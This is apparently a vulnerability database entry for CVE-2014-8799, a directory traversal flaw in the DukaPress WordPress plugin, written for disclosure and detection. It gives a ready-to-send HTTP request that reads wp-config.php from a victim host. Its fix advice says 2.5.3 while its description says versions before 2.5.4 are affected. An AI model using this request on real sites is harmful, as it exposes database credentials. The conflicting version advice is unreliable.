🔙 목록으로 돌아가기

CVE-2014-8799: WordPress Plugin DukaPress 2.5.2 - Directory Traversal

TitleWordPress Plugin DukaPress 2.5.2 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.
RemediationUpdate to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.
CVSS Score5
EPSS Score0.88094
CVE IDCVE-2014-8799
CWE IDCWE-22
Tags cve2014 cve wordpress wp-plugin lfi edb dukapress vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.

🌐 HTTP Request

GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-8799.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-8799.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A